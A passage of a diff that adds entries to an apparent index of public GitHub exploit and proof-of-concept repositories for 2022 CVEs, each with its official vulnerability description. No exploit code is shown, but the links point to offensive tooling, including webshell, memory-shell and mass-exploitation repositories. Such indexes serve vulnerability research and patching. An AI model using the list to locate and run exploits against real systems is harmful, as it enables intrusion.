- [UNICORDev/exploit-CVE-2022-25765](https://github.com/UNICORDev/exploit-CVE-2022-25765)
+- [lekosbelas/PDFkit-CMD-Injection](https://github.com/lekosbelas/PDFkit-CMD-Injection)
- [lowercasenumbers/CVE-2022-25765](https://github.com/lowercasenumbers/CVE-2022-25765)
### CVE-2022-25813 (2022-09-02)
@@ -2398,8 +11826,16 @@
- [hosch3n/FastjsonVulns](https://github.com/hosch3n/FastjsonVulns)
+- [nerowander/CVE-2022-25845-exploit](https://github.com/nerowander/CVE-2022-25845-exploit)
- [scabench/fastjson-tp1fn1](https://github.com/scabench/fastjson-tp1fn1)
+### CVE-2022-25927 (2023-01-25)
+
+Versions of the package ua-parser-js from 0.7.30 and before 0.7.33, from 0.8.1 and before 1.0.33 are vulnerable to Regular Expression Denial of Service (ReDoS) via the trim() function.\r\r
+
+
+- [masahiro331/cve-2022-25927](https://github.com/masahiro331/cve-2022-25927)
+
### CVE-2022-25943 (2022-03-09)
The installer of WPS Office for Windows versions prior to v11.2.0.10258 fails to configure properly the ACL for the directory where the service program is installed.
@@ -2484,6 +11920,8 @@
- [yyqxi/CVE-2022-26134](https://github.com/yyqxi/CVE-2022-26134)
- [b4dboy17/CVE-2022-26134](https://github.com/b4dboy17/CVE-2022-26134)
- [wjlin0/CVE-2022-26134](https://github.com/wjlin0/CVE-2022-26134)
+- [cbk914/CVE-2022-26134_check](https://github.com/cbk914/CVE-2022-26134_check)
+- [MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell](https://github.com/MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell)
- [Muhammad-Ali007/Atlassian_CVE-2022-26134](https://github.com/Muhammad-Ali007/Atlassian_CVE-2022-26134)
- [acfirthh/CVE-2022-26134](https://github.com/acfirthh/CVE-2022-26134)
- [yTxZx/CVE-2022-26134](https://github.com/yTxZx/CVE-2022-26134)
@@ -2526,6 +11964,7 @@
- [Inplex-sys/CVE-2022-26265](https://github.com/Inplex-sys/CVE-2022-26265)
+- [redteamsecurity2023/CVE-2022-26265](https://github.com/redteamsecurity2023/CVE-2022-26265)
### CVE-2022-26269 (2022-03-29)
@@ -2550,6 +11989,20 @@
- [watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc](https://github.com/watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc)
+### CVE-2022-26485 (2022-12-22)
+
+Removing an XSLT parameter during processing could have lead to an exploitable use-after-free. We have had reports of attacks in the wild abusing this flaw. This vulnerability affects Firefox < 97.0.2, Firefox ESR < 91.6.1, Firefox for Android < 97.3.0, Thunderbird < 91.6.2, and Focus < 97.3.0.
+
+
+- [mistymntncop/CVE-2022-26485](https://github.com/mistymntncop/CVE-2022-26485)
+
+### CVE-2022-26488 (2022-03-07)
+
+In Python before 3.10.3 on Windows, local users can gain privileges because the search path is inadequately secured. The installer may allow a local attacker to add user-writable directories to the system search path. To exploit, an administrator must have installed Python for all users and enabled PATH entries. A non-administrative user can trigger a repair that incorrectly adds user-writable paths into PATH, enabling search-path hijacking of other users and system services. This affects Python (CPython) through 3.7.12, 3.8.x through 3.8.12, 3.9.x through 3.9.10, and 3.10.x through 3.10.2.
+
+
+- [techspence/PyPATHPwner](https://github.com/techspence/PyPATHPwner)
+
### CVE-2022-26503 (2022-03-17)
Deserialization of untrusted data in Veeam Agent for Windows 2.0, 2.1, 2.2, 3.0.2, 4.x, and 5.x allows local users to run arbitrary code with local system privileges.
@@ -2728,6 +12181,13 @@
- [alirezac0/CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502)
+### CVE-2022-27518 (2022-12-13)
+
+Unauthenticated remote arbitrary code execution\n
+
+
+- [dolby360/CVE-2022-27518_POC](https://github.com/dolby360/CVE-2022-27518_POC)
+
### CVE-2022-27665 (2023-04-03)
Reflected XSS (via AngularJS sandbox escape expressions) exists in Progress Ipswitch WS_FTP Server 8.6.0. This can lead to execution of malicious code and commands on the client due to improper handling of user-provided input. By inputting malicious payloads in the subdirectory searchbar or Add folder filename boxes, it is possible to execute client-side commands. For example, there is Client-Side Template Injection via subFolderPath to the ThinClient/WtmApiService.asmx/GetFileSubTree URI.
@@ -2741,6 +12201,7 @@
- [plummm/CVE-2022-27666](https://github.com/plummm/CVE-2022-27666)
+- [Albocoder/cve-2022-27666-exploits](https://github.com/Albocoder/cve-2022-27666-exploits)
### CVE-2022-27772 (2022-03-30)
@@ -2878,6 +12339,7 @@
- [YouGina/CVE-2022-28346](https://github.com/YouGina/CVE-2022-28346)
- [DeEpinGh0st/CVE-2022-28346](https://github.com/DeEpinGh0st/CVE-2022-28346)
+- [vincentinttsh/CVE-2022-28346](https://github.com/vincentinttsh/CVE-2022-28346)
- [kamal-marouane/CVE-2022-28346](https://github.com/kamal-marouane/CVE-2022-28346)
### CVE-2022-28368 (2022-04-03)
@@ -2886,6 +12348,8 @@
- [rvizx/CVE-2022-28368](https://github.com/rvizx/CVE-2022-28368)
+- [That-Guy-Steve/CVE-2022-28368-handler](https://github.com/That-Guy-Steve/CVE-2022-28368-handler)
+- [Henryisnotavailable/Dompdf-Exploit-RCE](https://github.com/Henryisnotavailable/Dompdf-Exploit-RCE)
### CVE-2022-28381 (2022-04-03)
@@ -2942,6 +12406,7 @@
- [hacksysteam/CVE-2022-28672](https://github.com/hacksysteam/CVE-2022-28672)
+- [fastmo/CVE-2022-28672](https://github.com/fastmo/CVE-2022-28672)
### CVE-2022-28943
- [zhefox/CVE-2022-28943](https://github.com/zhefox/CVE-2022-28943)
@@ -3035,6 +12500,13 @@
- [EgeBalci/CVE-2022-29154](https://github.com/EgeBalci/CVE-2022-29154)
+### CVE-2022-29170 (2022-05-20)
+
+Grafana is an open-source platform for monitoring and observability. In Grafana Enterprise, the Request security feature allows list allows to configure Grafana in a way so that the instance doesn’t call or only calls specific hosts. The vulnerability present starting with version 7.4.0-beta1 and prior to versions 7.5.16 and 8.5.3 allows someone to bypass these security configurations if a malicious datasource (running on an allowed host) returns an HTTP redirect to a forbidden host. The vulnerability only impacts Grafana Enterprise when the Request security allow list is used and there is a possibility to add a custom datasource to Grafana which returns HTTP redirects. In this scenario, Grafana would blindly follow the redirects and potentially give secure information to the clients. Grafana Cloud is not impacted by this vulnerability. Versions 7.5.16 and 8.5.3 contain a patch for this issue. There are currently no known workarounds.
+
+
+- [yijikeji/CVE-2022-29170](https://github.com/yijikeji/CVE-2022-29170)
+
### CVE-2022-29221 (2022-05-24)
Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.45 and 4.1.1, template authors could inject php code by choosing a malicious {block} name or {include} file name. Sites that cannot fully trust template authors should upgrade to versions 3.1.45 or 4.1.1 to receive a patch for this issue. There are currently no known workarounds.
@@ -3069,6 +12541,7 @@
Improper parsing of HTTP requests in Pallets Werkzeug v2.1.0 and below allows attackers to perform HTTP Request Smuggling using a crafted HTTP request with multiple requests included inside the body. NOTE: the vendor's position is that this behavior can only occur in unsupported configurations involving development mode and an HTTP server from outside the Werkzeug project
+- [kevin-mizu/Werkzeug-CVE-2022-29361-PoC](https://github.com/kevin-mizu/Werkzeug-CVE-2022-29361-PoC)
- [l3ragio/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS](https://github.com/l3ragio/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS)
### CVE-2022-29383 (2022-05-13)
@@ -3086,6 +12559,11 @@
- [GULL2100/Wordpress_xss-CVE-2022-29455](https://github.com/GULL2100/Wordpress_xss-CVE-2022-29455)
- [akhilkoradiya/CVE-2022-29455](https://github.com/akhilkoradiya/CVE-2022-29455)
+- [5l1v3r1/CVE-2022-29455](https://github.com/5l1v3r1/CVE-2022-29455)
+- [yaudahbanh/CVE-2022-29455](https://github.com/yaudahbanh/CVE-2022-29455)
+- [0xkucing/CVE-2022-29455](https://github.com/0xkucing/CVE-2022-29455)
+- [tucommenceapousser/CVE-2022-29455](https://github.com/tucommenceapousser/CVE-2022-29455)
+- [tucommenceapousser/CVE-2022-29455-mass](https://github.com/tucommenceapousser/CVE-2022-29455-mass)
### CVE-2022-29464 (2022-04-18)
@@ -3256,6 +12734,13 @@
- [SAJIDAMINE/CVE-2022-30075](https://github.com/SAJIDAMINE/CVE-2022-30075)
- [M4fiaB0y/CVE-2022-30075](https://github.com/M4fiaB0y/CVE-2022-30075)
+### CVE-2022-30114 (2023-05-19)
+
+A heap-based buffer overflow in a network service in Fastweb FASTGate MediaAccess FGA2130FWB, firmware version 18.3.n.0482_FW_230_FGA2130, and DGA4131FWB, firmware version up to 18.3.n.0462_FW_261_DGA4131, allows a remote attacker to reboot the device through a crafted HTTP request, causing DoS.
+
+
+- [str0ng4le/CVE-2022-30114](https://github.com/str0ng4le/CVE-2022-30114)
+
### CVE-2022-30129 (2022-05-10)
Visual Studio Code Remote Code Execution Vulnerability
@@ -3269,6 +12754,7 @@
- [fortra/CVE-2022-30136](https://github.com/fortra/CVE-2022-30136)
+- [VEEXH/CVE-2022-30136](https://github.com/VEEXH/CVE-2022-30136)
### CVE-2022-30190 (2022-06-01)
@@ -3350,8 +12836,10 @@
- [0xAbbarhSF/FollinaXploit](https://github.com/0xAbbarhSF/FollinaXploit)
- [michealadams30/Cve-2022-30190](https://github.com/michealadams30/Cve-2022-30190)
- [melting0256/Enterprise-Cybersecurity](https://github.com/melting0256/Enterprise-Cybersecurity)
+- [yrkuo/CVE-2022-30190](https://github.com/yrkuo/CVE-2022-30190)
- [ToxicEnvelope/FOLLINA-CVE-2022-30190](https://github.com/ToxicEnvelope/FOLLINA-CVE-2022-30190)
- [meowhua15/CVE-2022-30190](https://github.com/meowhua15/CVE-2022-30190)
+- [aminetitrofine/CVE-2022-30190](https://github.com/aminetitrofine/CVE-2022-30190)
- [Muhammad-Ali007/Follina_MSDT_CVE-2022-30190](https://github.com/Muhammad-Ali007/Follina_MSDT_CVE-2022-30190)
- [Jump-Wang-111/AmzWord](https://github.com/Jump-Wang-111/AmzWord)
- [shri142/ZipScan](https://github.com/shri142/ZipScan)
@@ -3443,6 +12931,13 @@
- [bigzooooz/CVE-2022-30514](https://github.com/bigzooooz/CVE-2022-30514)
+### CVE-2022-30524 (2022-05-09)
+
+There is an invalid memory access in the TextLine class in TextOutputDev.cc in Xpdf 4.0.4 because the text extractor mishandles characters at large y coordinates. It can be triggered by (for example) sending a crafted pdf file to the pdftotext binary, which allows a remote attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact.
+
+
+- [rishvic/xpdf-docker](https://github.com/rishvic/xpdf-docker)
+
### CVE-2022-30525 (2022-05-12)
A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
@@ -3462,6 +12957,7 @@
- [west9b/CVE-2022-30525](https://github.com/west9b/CVE-2022-30525)
- [furkanzengin/CVE-2022-30525](https://github.com/furkanzengin/CVE-2022-30525)
- [ProngedFork/CVE-2022-30525](https://github.com/ProngedFork/CVE-2022-30525)
+- [cbk914/CVE-2022-30525_check](https://github.com/cbk914/CVE-2022-30525_check)
- [arajsingh-infosec/CVE-2022-30525_Exploit](https://github.com/arajsingh-infosec/CVE-2022-30525_Exploit)
### CVE-2022-30526 (2022-07-19)
@@ -3559,6 +13055,13 @@
- [ly1g3/Mailcow-CVE-2022-31138](https://github.com/ly1g3/Mailcow-CVE-2022-31138)
+### CVE-2022-31144 (2022-07-19)
+
+Redis is an in-memory database that persists on disk. A specially crafted `XAUTOCLAIM` command on a stream key in a specific state may result with heap overflow, and potentially remote code execution. This problem affects versions on the 7.x branch prior to 7.0.4. The patch is released in version 7.0.4.
+
+
+- [SpiralBL0CK/CVE-2022-31144](https://github.com/SpiralBL0CK/CVE-2022-31144)
+
### CVE-2022-31181 (2022-08-01)
PrestaShop is an Open Source e-commerce platform. In versions from 1.6.0.10 and before 1.7.8.7 PrestaShop is subject to an SQL injection vulnerability which can be chained to call PHP's Eval function on attacker input. The problem is fixed in version 1.7.8.7. Users are advised to upgrade. Users unable to upgrade may delete the MySQL Smarty cache feature.
@@ -3704,6 +13207,13 @@
- [SpindleSec/cve-2022-31692](https://github.com/SpindleSec/cve-2022-31692)
- [hotblac/cve-2022-31692](https://github.com/hotblac/cve-2022-31692)
+### CVE-2022-31705 (2022-12-14)
+
+VMware ESXi, Workstation, and Fusion contain a heap out-of-bounds write vulnerability in the USB 2.0 controller (EHCI). A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed.
+
+
+- [s0duku/cve-2022-31705](https://github.com/s0duku/cve-2022-31705)
+
### CVE-2022-31749
- [jbaines-r7/hook](https://github.com/jbaines-r7/hook)
- [iveresk/cve-2022-31749](https://github.com/iveresk/cve-2022-31749)
@@ -3728,6 +13238,11 @@
- [EvergreenCartoons/SenselessViolence](https://github.com/EvergreenCartoons/SenselessViolence)
+- [Madliife0/CVE-2022-31814](https://github.com/Madliife0/CVE-2022-31814)
+- [TheUnknownSoul/CVE-2022-31814](https://github.com/TheUnknownSoul/CVE-2022-31814)
+- [drcayber/RCE](https://github.com/drcayber/RCE)
+- [Chocapikk/CVE-2022-31814](https://github.com/Chocapikk/CVE-2022-31814)
+- [dkstar11q/CVE-2022-31814](https://github.com/dkstar11q/CVE-2022-31814)
### CVE-2022-31854 (2022-07-07)
@@ -3736,6 +13251,20 @@
- [Vikaran101/CVE-2022-31854](https://github.com/Vikaran101/CVE-2022-31854)
+### CVE-2022-31889 (2023-04-05)
+
+Cross Site Scripting (XSS) vulnerability in audit/templates/auditlogs.tmpl.php in osTicket osTicket-plugins before commit a7842d494889fd5533d13deb3c6a7789768795ae.
+
+
+- [reewardius/CVE-2022-31889](https://github.com/reewardius/CVE-2022-31889)
+
+### CVE-2022-31890 (2023-04-05)
+
+SQL Injection vulnerability in audit/class.audit.php in osTicket osTicket-plugins before commit a7842d494889fd5533d13deb3c6a7789768795ae via the order parameter to the getOrder function.
+
+
+- [reewardius/CVE-2022-31890](https://github.com/reewardius/CVE-2022-31890)
+
### CVE-2022-31897 (2022-06-29)
SourceCodester Zoo Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via public_html/register_visitor?msg=.
@@ -3792,6 +13321,13 @@
- [mgregus/project_BIT_nmap_script](https://github.com/mgregus/project_BIT_nmap_script)
+### CVE-2022-32074 (2022-07-13)
+
+A stored cross-site scripting (XSS) vulnerability in the component audit/class.audit.php of osTicket-plugins - Storage-FS before commit a7842d494889fd5533d13deb3c6a7789768795ae allows attackers to execute arbitrary web scripts or HTML via a crafted SVG file.
+
+
+- [reewardius/CVE-2022-32074](https://github.com/reewardius/CVE-2022-32074)
+
### CVE-2022-32114 (2022-07-13)
An unrestricted file upload vulnerability in the Add New Assets function of Strapi 4.1.12 allows attackers to conduct XSS attacks via a crafted PDF file. NOTE: the project documentation suggests that a user with the Media Library "Create (upload)" permission is supposed to be able to upload PDF files containing JavaScript, and that all files in a public assets folder are accessible to the outside world (unless the filename begins with a dot character). The administrator can choose to allow only image, video, and audio files (i.e., not PDF) if desired.
@@ -3813,6 +13349,16 @@
- [JC175/CVE-2022-32119](https://github.com/JC175/CVE-2022-32119)
+### CVE-2022-32132
+- [reewardius/CVE-2022-32132](https://github.com/reewardius/CVE-2022-32132)
+
+### CVE-2022-32199 (2023-03-27)
+
+db_convert.php in ScriptCase through 9.9.008 is vulnerable to Arbitrary File Deletion by an admin via a directory traversal sequence in the file parameter.
+
+
+- [Toxich4/CVE-2022-32199](https://github.com/Toxich4/CVE-2022-32199)
+
### CVE-2022-32223 (2022-07-14)
Node.js is vulnerable to Hijack Execution Flow: DLL Hijacking under certain conditions on Windows platforms.This vulnerability can be exploited if the victim has the following dependencies on a Windows machine:* OpenSSL has been installed and “C:\Program Files\Common Files\SSL\openssl.cnf” exists.Whenever the above conditions are present, `node.exe` will search for `providers.dll` in the current user directory.After that, `node.exe` will try to search for `providers.dll` by the DLL Search Order in Windows.It is possible for an attacker to place the malicious file `providers.dll` under a variety of paths and exploit this vulnerability.
@@ -3833,6 +13379,7 @@
- [theori-io/CVE-2022-32250-exploit](https://github.com/theori-io/CVE-2022-32250-exploit)
+- [ysanatomic/CVE-2022-32250-LPE](https://github.com/ysanatomic/CVE-2022-32250-LPE)
- [Decstor5/2022-32250LPE](https://github.com/Decstor5/2022-32250LPE)
- [Kristal-g/CVE-2022-32250](https://github.com/Kristal-g/CVE-2022-32250)
@@ -3907,6 +13454,13 @@
- [angelopioamirante/CVE-2022-33075](https://github.com/angelopioamirante/CVE-2022-33075)
+### CVE-2022-33082 (2022-06-30)
+
+An issue in the AST parser (ast/compile.go) of Open Policy Agent v0.10.2 allows attackers to cause a Denial of Service (DoS) via a crafted input.
+
+
+- [cyberqueenmeg/cve-2022-33082-exploit](https://github.com/cyberqueenmeg/cve-2022-33082-exploit)
+
### CVE-2022-33174 (2022-06-13)
Power Distribution Units running on Powertek firmware (multiple brands) before 3.30.30 allows remote authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext.
@@ -3966,6 +13520,7 @@
- [bor8/CVE-2022-34169](https://github.com/bor8/CVE-2022-34169)
+- [flowerwind/AutoGenerateXalanPayload](https://github.com/flowerwind/AutoGenerateXalanPayload)
### CVE-2022-34265 (2022-07-04)
@@ -3984,6 +13539,27 @@
- [watchtowrlabs/CVE-2022-34298](https://github.com/watchtowrlabs/CVE-2022-34298)
+### CVE-2022-34527 (2022-07-29)
+
+D-Link DSL-3782 v1.03 and below was discovered to contain a command injection vulnerability via the function byte_4C0160.
+
+
+- [FzBacon/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection](https://github.com/FzBacon/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection)
+
+### CVE-2022-34556 (2022-07-28)
+
+PicoC v3.2.2 was discovered to contain a NULL pointer dereference at variable.c.
+
+
+- [Halcy0nic/CVE-2022-34556](https://github.com/Halcy0nic/CVE-2022-34556)
+
+### CVE-2022-34683 (2022-12-30)
+
+NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a null-pointer dereference occurs, which may lead to denial of service.
+
+
+- [gmh5225/CVE-2022-34683](https://github.com/gmh5225/CVE-2022-34683)
+
### CVE-2022-34715 (2022-08-09)
Windows Network File System Remote Code Execution Vulnerability
@@ -4012,6 +13588,13 @@
- [K3ysTr0K3R/CVE-2022-34753-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-34753-EXPLOIT)
+### CVE-2022-34913 (2022-07-02)
+
+md2roff 1.7 has a stack-based buffer overflow via a Markdown file containing a large number of consecutive characters to be processed. NOTE: the vendor's position is that the product is not intended for untrusted input
+
+
+- [Halcy0nic/CVE-2022-34913](https://github.com/Halcy0nic/CVE-2022-34913)
+
### CVE-2022-34918 (2022-07-04)
An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges, a different vulnerability than CVE-2022-32250. (The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access.) This can be fixed in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.
@@ -4107,6 +13690,13 @@
- [p1ckzi/CVE-2022-35513](https://github.com/p1ckzi/CVE-2022-35513)
+### CVE-2022-35649 (2022-07-25)
+
+The vulnerability was found in Moodle, occurs due to improper input validation when parsing PostScript code. An omitted execution parameter results in a remote code execution risk for sites running GhostScript versions older than 9.50. Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
+
+
+- [antoinenguyen-09/CVE-2022-35649](https://github.com/antoinenguyen-09/CVE-2022-35649)
+
### CVE-2022-35698 (2022-10-11)
Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by a Stored Cross-site Scripting vulnerability. Exploitation of this issue does not require user interaction and could result in a post-authentication arbitrary code execution.
@@ -4120,6 +13710,7 @@
- [gmh5225/CVE-2022-35737](https://github.com/gmh5225/CVE-2022-35737)
+- [rvermeulen/codeql-cve-2022-35737](https://github.com/rvermeulen/codeql-cve-2022-35737)
### CVE-2022-35841 (2022-09-13)
@@ -4144,6 +13735,7 @@
- [Lzer0Kx01/CVE-2022-35914](https://github.com/Lzer0Kx01/CVE-2022-35914)
- [6E6L6F/CVE-2022-35914](https://github.com/6E6L6F/CVE-2022-35914)
- [0xGabe/CVE-2022-35914](https://github.com/0xGabe/CVE-2022-35914)
+- [Johnermac/CVE-2022-35914](https://github.com/Johnermac/CVE-2022-35914)
- [allendemoura/CVE-2022-35914](https://github.com/allendemoura/CVE-2022-35914)
- [0romos/CVE-2022-35914](https://github.com/0romos/CVE-2022-35914)
@@ -4168,6 +13760,13 @@
### CVE-2022-36163
- [MaherAzzouzi/CVE-2022-36163](https://github.com/MaherAzzouzi/CVE-2022-36163)
+### CVE-2022-36193 (2022-11-28)
+
+SQL injection in School Management System 1.0 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries.
+
+
+- [G37SYS73M/CVE-2022-36193](https://github.com/G37SYS73M/CVE-2022-36193)
+
### CVE-2022-36200 (2022-08-29)
In FiberHome VDSL2 Modem HG150-Ub_V3.0, Credentials of Admin are submitted in URL, which can be logged/sniffed.
@@ -4262,6 +13861,13 @@
- [aqeisi/CVE-2022-36663-PoC](https://github.com/aqeisi/CVE-2022-36663-PoC)
+### CVE-2022-36752 (2022-07-28)
+
+png2webp v1.0.4 was discovered to contain an out-of-bounds write via the function w2p. This vulnerability is exploitable via a crafted png file.
+
+
+- [Halcy0nic/CVE-2022-36752](https://github.com/Halcy0nic/CVE-2022-36752)
+
### CVE-2022-36779 (2022-08-21)
PROSCEND - PROSCEND / ADVICE .Ltd - G/5G Industrial Cellular Router (with GPS)4 Unauthenticated OS Command Injection Proscend M330-w / M33-W5 / M350-5G / M350-W5G / M350-6 / M350-W6 / M301-G / M301-GW ADVICE ICR 111WG / https://www.proscend.com/en/category/industrial-Cellular-Router/industrial-Cellular-Router.html https://cdn.shopify.com/s/files/1/0036/9413/3297/files/ADVICE_Industrial_4G_LTE_Cellular_Router_ICR111WG.pdf?v=1620814301
@@ -4288,6 +13894,15 @@
- [Inplex-sys/CVE-2022-36804](https://github.com/Inplex-sys/CVE-2022-36804)
- [ColdFusionX/CVE-2022-36804](https://github.com/ColdFusionX/CVE-2022-36804)
- [devengpk/CVE-2022-36804](https://github.com/devengpk/CVE-2022-36804)
+- [walnutsecurity/cve-2022-36804](https://github.com/walnutsecurity/cve-2022-36804)
+- [imbas007/Atlassian-Bitbucket-CVE-2022-36804](https://github.com/imbas007/Atlassian-Bitbucket-CVE-2022-36804)
+
+### CVE-2022-36944 (2022-09-23)
+
+Scala 2.13.x before 2.13.9 has a Java deserialization chain in its JAR file. On its own, it cannot be exploited. There is only a risk in conjunction with Java object deserialization within an application. In such situations, it allows attackers to erase contents of arbitrary files, make network connections, or possibly run arbitrary code (specifically, Function0 functions) via a gadget chain.
+
+
+- [yarocher/lazylist-cve-poc](https://github.com/yarocher/lazylist-cve-poc)
### CVE-2022-36946 (2022-07-27)
@@ -4297,6 +13912,13 @@
- [Pwnzer0tt1/CVE-2022-36946](https://github.com/Pwnzer0tt1/CVE-2022-36946)
- [Satheesh575555/linux-4.19.72_CVE-2022-36946](https://github.com/Satheesh575555/linux-4.19.72_CVE-2022-36946)
+### CVE-2022-37032 (2022-09-19)
+
+An out-of-bounds read in the BGP daemon of FRRouting FRR before 8.4 may lead to a segmentation fault and denial of service. This occurs in bgp_capability_msg_parse in bgpd/bgp_packet.c.
+
+
+- [spwpun/CVE-2022-37032](https://github.com/spwpun/CVE-2022-37032)
+
### CVE-2022-37042 (2022-08-11)
Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.
@@ -4389,6 +14011,13 @@
- [dbyio/cve-2022-37298](https://github.com/dbyio/cve-2022-37298)
+### CVE-2022-37332 (2022-11-10)
+
+A use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 12.0.1.12430. A specially-crafted PDF document can trigger the reuse of previously freed memory via misusing media player API, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted, malicious site if the browser plugin extension is enabled.
+
+
+- [SpiralBL0CK/CVE-2022-37332-RCE-](https://github.com/SpiralBL0CK/CVE-2022-37332-RCE-)
+
### CVE-2022-37434 (2022-08-05)
zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).
@@ -4426,6 +14055,7 @@
- [MaherAzzouzi/CVE-2022-37706-LPE-exploit](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit)
- [ECU-10525611-Xander/CVE-2022-37706](https://github.com/ECU-10525611-Xander/CVE-2022-37706)
+- [GrayHatZone/CVE-2022-37706-LPE-exploit](https://github.com/GrayHatZone/CVE-2022-37706-LPE-exploit)
- [junnythemarksman/CVE-2022-37706](https://github.com/junnythemarksman/CVE-2022-37706)
### CVE-2022-37708
@@ -4438,12 +14068,21 @@
- [fortra/CVE-2022-37969](https://github.com/fortra/CVE-2022-37969)
+### CVE-2022-38181 (2022-10-25)
+
+The Arm Mali GPU kernel driver allows unprivileged users to access freed memory because GPU memory operations are mishandled. This affects Bifrost r0p0 through r38p1, and r39p0; Valhall r19p0 through r38p1, and r39p0; and Midgard r4p0 through r32p0.
+
+
+- [Pro-me3us/CVE_2022_38181_Raven](https://github.com/Pro-me3us/CVE_2022_38181_Raven)
+- [Pro-me3us/CVE_2022_38181_Gazelle](https://github.com/Pro-me3us/CVE_2022_38181_Gazelle)
+
### CVE-2022-38374 (2022-11-02)
A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiADC 7.0.0 - 7.0.2 and 6.2.0 - 6.2.4 allows an attacker to execute unauthorized code or commands via the URL and User fields observed in the traffic and event logviews.
- [azhurtanov/CVE-2022-38374](https://github.com/azhurtanov/CVE-2022-38374)
+- [M4fiaB0y/CVE-2022-38374](https://github.com/M4fiaB0y/CVE-2022-38374)
### CVE-2022-38553 (2022-09-26)
@@ -4503,6 +14142,13 @@
- [v0lp3/CVE-2022-39066](https://github.com/v0lp3/CVE-2022-39066)
+### CVE-2022-39073 (2023-01-06)
+
+There is a command injection vulnerability in ZTE MF286R, Due to insufficient validation of the input parameters, an attacker could use the vulnerability to execute arbitrary commands.
+
+
+- [v0lp3/CVE-2022-39073](https://github.com/v0lp3/CVE-2022-39073)
+
### CVE-2022-39196 (2022-09-04)
Blackboard Learn 1.10.1 allows remote authenticated users to read unintended files by entering student credentials and then directly visiting a certain webapps/bbcms/execute/ URL. Note: The vendor disputes this stating this cannot be reproduced.
@@ -4528,6 +14174,7 @@
- [its-arun/CVE-2022-39197](https://github.com/its-arun/CVE-2022-39197)
- [TheCryingGame/CVE-2022-39197-RCE](https://github.com/TheCryingGame/CVE-2022-39197-RCE)
- [adeljck/CVE-2022-39197](https://github.com/adeljck/CVE-2022-39197)
+- [xiao-zhu-zhu/pig_CS4.4](https://github.com/xiao-zhu-zhu/pig_CS4.4)
- [Romanc9/Gui-poc-test](https://github.com/Romanc9/Gui-poc-test)
### CVE-2022-39227 (2022-09-23)
@@ -4544,6 +14191,7 @@
- [ssst0n3/docker-cve-2022-39253-poc](https://github.com/ssst0n3/docker-cve-2022-39253-poc)
+- [HiImDarwin/NetworkSecurityFinalProject](https://github.com/HiImDarwin/NetworkSecurityFinalProject)
### CVE-2022-39299 (2022-10-12)
@@ -4577,6 +14225,16 @@
### CVE-2022-39841
- [stealthcopter/CVE-2022-39841](https://github.com/stealthcopter/CVE-2022-39841)
+### CVE-2022-39952 (2023-02-16)
+
+A external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP request.
+
+
+- [horizon3ai/CVE-2022-39952](https://github.com/horizon3ai/CVE-2022-39952)
+- [shiyeshu/CVE-2022-39952_webshell](https://github.com/shiyeshu/CVE-2022-39952_webshell)
+- [Chocapikk/CVE-2022-39952](https://github.com/Chocapikk/CVE-2022-39952)
+- [dkstar11q/CVE-2022-39952-better](https://github.com/dkstar11q/CVE-2022-39952-better)
+
### CVE-2022-39959 (2022-10-07)
